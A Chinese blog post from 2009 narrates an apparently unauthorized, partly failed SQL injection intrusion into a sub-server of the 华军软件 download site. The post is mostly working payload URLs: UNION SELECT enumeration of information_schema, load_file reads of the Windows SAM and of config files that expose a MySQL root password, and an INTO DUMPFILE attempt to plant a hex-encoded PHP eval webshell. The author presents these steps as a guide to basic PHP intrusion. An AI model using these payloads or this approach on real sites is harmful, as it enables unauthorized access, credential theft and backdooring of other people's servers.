白银时代
一个人的精彩

题外话：大家剩蛋快乐哈，本大王对西节不感兴趣。
来源：http://www.3est.com/viewthread.PHP?tid=1687

今天在群里闲聊的时候，群里的人突然丢出来一个PHP的注入点。让我们去看看，反正闲着也是闲着，去看看呗。去看的时候吓了一跳，是华军软件的一个分服务器。具体是怎么网络环境没有拿到shell，也不是很清楚。还是先把过程写出来让大家看看，有不对的地方还请大家指正。。。
http://Target/Target.PHP?id=92342 一个非常标准的php注入点，手工上吧，手工检查比较刺激，貌似现在自动检测的php工具也是有的，不过不是很好用。
先判断长度http://Target/Target.php?id=92342+order+by+23 返回正常
看看版本先，如果低于5.0那就郁闷咯。。。。

很好，是5.0.51a的，而且还是root权限……在windows，如果你得到了root的权限，你就要本着“我是root我怕谁”的思想去。因为你是root权限~~~吼吼……
在windows里面理论上来说可以用load_file来读取系统里面的任意文件（当然是要在知道文件路径的情况下）包括SAM。
不过在linux里面貌似也可以读很多文件，包括/etc/password文件，不过貌似现在的linux系统之间读/etc/password文件读出来也没有什么大的用处，在/etc/password 里面他现在的密码是X。真正的密码放在另外的一个文件里面，这个文件只有root才能访问。但是读读一些配置文件还是绰绰有余的。

关于load_file的应用大家可以到这里去看：http://hi.baidu.com/jhsxy/blog/item/45e644fbbb7cb015a9d311b3.html
上面说了这么多废话，下面就来读他的SAM吧，具体的读取过程我就不写出来了。具体的过程都在那个篇文章里，大家之间去看吧。

但是结果非常郁闷，当我把这个导入的LC5里面去的时候，密码部分他显示的是空白。尴尬。。。看来之间读SAM，然后登陆这条路是段了。
还是来爆它的数据库，先看看他有那几个数据库。
http://Target/Target.php?id=92342%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,group_concat(schema_name),14,15,16,17,18,19,20,21,22,23%20from%20information_schema.schemata

现在用的数据库是newhuaadmin。看看里面有那几张表吧：

具体的表名我就不贴出来了，很长一大堆。看看那几张表比较关键吧：
user
admin_search0
admin_server
admin_soft
admin_sort这是看上去比较关键的表，其他的表我也看过了，都是存储一些配置信息的，看了也百看。
先看看user表里有什么内容吧，
http://Target/Target.php?id=92342%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,group_concat(column_name),14,15,16,17,18,19,20,21,22,23%20from%20information_schema.columns%20where%20table_name=0×75736572–

有user和password，看看里面什么内容。。。
http://Target/Target.php?id=92342%20and%201=2%20union%20select%201,2,user,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20′user’–
但是当我读表里面的东西的时候，却提示错误了，尴尬。。。

当我继续读其他表的时候，也没有发现什么其他有用的内容，上面既然爆出来网站的路径，直接写入一句话吧
http://Target/Target.php?id=92342%20and%201=2%20union%20select%201,2,3,4,5,6,7,concat(0×3C3F706870206576616C28245F504F53545B636D645D293B3F3E),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 into dumpfile ‘E:%5C%5Cdownload86516%5C%5Cdoor.php’
失败。。。。。不知道为什么，难道是我写一句话的方式不对，我弄了这么多的php网站，root
也碰到过很多，但是直接写入一句话基本上都是失败的。不知道是我写的方式不对，还是怎么样。还请高人指教。
算了，还是读文件吧！先读一下E:\XXXXXXXXX\require\mysql.class.php文件吧
子这里文件里，发现了两个比较敏感的文件
config/config.php
require_once(ROOT.’config/setting.php’);/
require_once(ROOT.’config/config.php’);
继续，在config/config.php成功的爆出来root的密码
config/config.php中的内容
$mysql['host'] = ‘localhost’;
$mysql['user'] = ‘root’;
mysql['password'] = ‘XXXXXXXXXXXXXXXXX’;（密码我用xxx代替啦~）
telnet下他的3306端口，看看能不能支持外连接

不允许连接……
尝试了其他的方法，但是都不行。也在服务器上发现了其他的网站，但是当我写入文件时，都不能够直接写入。
到此为止我已经是黔驴技穷了，没有办法。也算是把php入侵的一些基本方法给些出来了。有什么地方还没有做到得还希望大牛们指正

作者: 白大王

该日志由 白大王 于 2009年12月25日 发表在 入侵辅助 分类下， 你可以发表评论。
在保留原文地址及作者 白大王 相关链接的情况下引用到你的网站或博客。
转载请注明: 对华军软件站一次失败的入侵 | 白银时代
标签: 入侵